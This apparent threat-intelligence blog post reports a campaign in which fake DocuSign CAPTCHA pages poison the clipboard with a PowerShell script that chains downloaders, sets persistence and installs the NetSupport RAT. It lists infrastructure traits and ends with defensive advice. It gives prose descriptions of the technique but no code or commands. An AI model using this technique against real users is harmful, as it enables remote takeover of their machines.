Recently, I have been receiving emails from stangers that appeared to be from Docusign for my signature, now I know why. A new malware campaign using fake DocuSign verification pages to deploy the NetSupport Remote Access Trojan (RAT) has been uncovered. According to DomainTools, the campaign tricks users into infecting their own machines through a series of deceptive steps involving clipboard manipulation and disguised scripts. At the core of the campaign is a spoofed DocuSign website that mimics a CAPTCHA verification screen. Users are prompted to check a box that triggers clipboard poisoning. A malicious PowerShell script is copied to the user’s clipboard, with instructions to paste and run it via the Windows Run prompt.
Once executed, the script downloads a second-stage payload, which sets up persistence on the victim’s machine. This involves downloading an executable from GitHub and placing a shortcut in the Startup folder. The final stage delivers NetSupport RAT, allowing the attacker to maintain remote access. The initial script and site obfuscate their intent using ROT13 encoding and blend Cloudflare and DocuSign branding to appear legitimate. Meanwhile, the attack’s architecture uses multiple steps to bypass security defenses, each script acting as a downloader for the next.
The DomainTools investigation also revealed a broader infrastructure supporting this campaign. Domains mimicking Gitcodes, Okta and popular media apps like Netflix and Spotify were identified.
The same techniques, CAPTCHA spoofing, script chaining and clipboard attacks, were found across these platforms.
Several domains shared common traits, including:
- Registration via Cloudflare, NameCheap and NameSilo.
- Name servers linked to cloudflare[.]com and luxhost[.]org
- SSL certificates issued by WE1.
- Malware hosted on GitHub and Discord content delivery networks.
Despite the sophistication of the attack, the tools used are familiar.
These include NetSupport Manager, a legitimate remote administration tool, which is frequently repurposed in cyber-attacks. Similar techniques have been used by groups such as FIN7 and STORM-0408, though attribution remains unclear. DomainTools urged users to stay alert, especially when prompted to run PowerShell scripts by unfamiliar websites. No legitimate site should ask users to paste commands into the Windows Run prompt under the pretense of verification. CAPTCHA pages that trigger script execution are also a clear warning sign.
Users should closely inspect URLs and SSL certificates, watching for subtle misspellings, strange domain extensions or unrecognized certificate issuers. These are often signs of spoofed websites. DomainTools emphasized that these attacks rely more on user deception than technical flaws. Staying skeptical and verifying legitimacy before acting remains one of the strongest defenses.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com
Weekly Cyber Intelligence Briefings:
- Reporting: https://www. redskyalliance. org/
- Website: https://www. redskyalliance. com/
- LinkedIn: https://www. linkedin. com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://attendee.gotowebinar.com/register/5504229295967742989
https://www.infosecurity-magazine.com/news/fake-docusign-pages-deliver-rat/
Comments